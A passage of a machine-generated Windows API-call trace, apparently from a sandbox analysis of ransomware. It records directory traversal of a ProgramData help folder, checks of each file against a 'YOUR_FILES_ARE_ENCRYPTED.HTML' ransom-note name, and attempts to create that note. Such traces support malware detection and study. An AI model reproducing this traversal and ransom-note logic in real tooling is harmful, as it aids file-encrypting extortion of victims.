cAlternateFileName="膠݀")) returned 0xffffffff [0169.001] GetProcessHeap () returned 0x270000 [0169.001] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0169.001] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcc217c20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc217c20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0169.001] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft") returned 32 [0169.001] GetProcessHeap () returned 0x270000 [0169.001] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0169.001] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft") returned="\\\\?\\C:\\Users\\All Users\\Microsoft" [0169.002] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*" [0169.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcc217c20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc217c20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0169.002] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcc217c20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc217c20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.002] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0169.002] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance") returned 43 [0169.002] GetProcessHeap () returned 0x270000 [0169.002] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.002] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance" [0169.002] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*" [0169.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.002] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.002] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Client", cAlternateFileName="")) returned 1 [0169.002] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client") returned 50 [0169.003] GetProcessHeap () returned 0x270000 [0169.003] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x749a470 [0169.003] lstrcpyW (in: lpString1=0x749a470, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client" [0169.003] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*" [0169.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.003] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.003] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="1.0", cAlternateFileName="")) returned 1 [0169.003] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0") returned 54 [0169.003] GetProcessHeap () returned 0x270000 [0169.003] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74aa478 [0169.003] lstrcpyW (in: lpString1=0x74aa478, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0" [0169.003] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*" [0169.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.003] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.004] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.004] wnsprintfW (in: pszDest=0x74aa478, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned 60 [0169.004] GetProcessHeap () returned 0x270000 [0169.004] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7582858 [0169.005] lstrcpyW (in: lpString1=0x7582858, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0169.005] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*" [0169.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0169.006] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.006] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x964fb1e0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xdb06b774, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xd56b6fd0, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x2f22, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_CValidator.H1D", cAlternateFileName="HELP_C~1.H1D")) returned 1 [0169.006] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 80 [0169.006] lstrcmpW (lpString1="Help_CValidator.H1D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.006] PathFindExtensionW (pszPath="Help_CValidator.H1D") returned=".H1D" [0169.006] lstrlenW (lpString=".H1D") returned 4 [0169.006] PathFindExtensionW (pszPath="Help_CValidator.H1D") returned=".H1D" [0169.006] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde50558e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde50558e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x365fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MKWD_AssetId.H1W", cAlternateFileName="HELP_M~1.H1W")) returned 1 [0169.006] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 82 [0169.006] lstrcmpW (lpString1="Help_MKWD_AssetId.H1W", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.006] PathFindExtensionW (pszPath="Help_MKWD_AssetId.H1W") returned=".H1W" [0169.006] lstrlenW (lpString=".H1W") returned 4 [0169.006] PathFindExtensionW (pszPath="Help_MKWD_AssetId.H1W") returned=".H1W" [0169.006] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde6f5420, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde6f5420, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x325ec, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MKWD_BestBet.H1W", cAlternateFileName="HELP_M~2.H1W")) returned 1 [0169.006] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 82 [0169.006] lstrcmpW (lpString1="Help_MKWD_BestBet.H1W", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.006] PathFindExtensionW (pszPath="Help_MKWD_BestBet.H1W") returned=".H1W" [0169.006] lstrlenW (lpString=".H1W") returned 4 [0169.007] PathFindExtensionW (pszPath="Help_MKWD_BestBet.H1W") returned=".H1W" [0169.007] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x79f16, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MTOC_help.H1H", cAlternateFileName="HELP_M~1.H1H")) returned 1 [0169.007] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 79 [0169.007] lstrcmpW (lpString1="Help_MTOC_help.H1H", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.007] PathFindExtensionW (pszPath="Help_MTOC_help.H1H") returned=".H1H" [0169.007] lstrlenW (lpString=".H1H") returned 4 [0169.541] PathFindExtensionW (pszPath="Help_MTOC_help.H1H") returned=".H1H" [0169.541] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x98d10a72, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x3944, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MValidator.H1D", cAlternateFileName="HELP_M~1.H1D")) returned 1 [0169.541] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 80 [0169.541] lstrcmpW (lpString1="Help_MValidator.H1D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.541] PathFindExtensionW (pszPath="Help_MValidator.H1D") returned=".H1D" [0169.541] lstrlenW (lpString=".H1D") returned 4 [0169.541] PathFindExtensionW (pszPath="Help_MValidator.H1D") returned=".H1D" [0169.541] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MValidator.Lck", cAlternateFileName="HELP_M~1.LCK")) returned 1 [0169.541] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 80 [0169.541] lstrcmpW (lpString1="Help_MValidator.Lck", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.541] PathFindExtensionW (pszPath="Help_MValidator.Lck") returned=".Lck" [0169.541] lstrlenW (lpString=".Lck") returned 4 [0169.541] PathFindExtensionW (pszPath="Help_MValidator.Lck") returned=".Lck" [0169.541] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x96bd5e0c, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0xd53c7, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 1 [0169.542] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 107 [0169.542] lstrcmpW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.542] PathFindExtensionW (pszPath="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned=".H1Q" [0169.542] lstrlenW (lpString=".H1Q") returned 4 [0169.542] PathFindExtensionW (pszPath="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned=".H1Q" [0169.542] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.542] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0169.542] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.542] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.542] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0169.542] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0169.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.542] GetProcessHeap () returned 0x270000 [0169.543] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7582858 | out: hHeap=0x270000) returned 1 [0169.551] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.551] wnsprintfW (in: pszDest=0x74aa478, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0169.551] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.551] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.551] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.554] wnsprintfW (in: pszDest=0x74aa478, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0169.555] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.555] GetProcessHeap () returned 0x270000 [0169.556] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74aa478 | out: hHeap=0x270000) returned 1 [0169.567] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 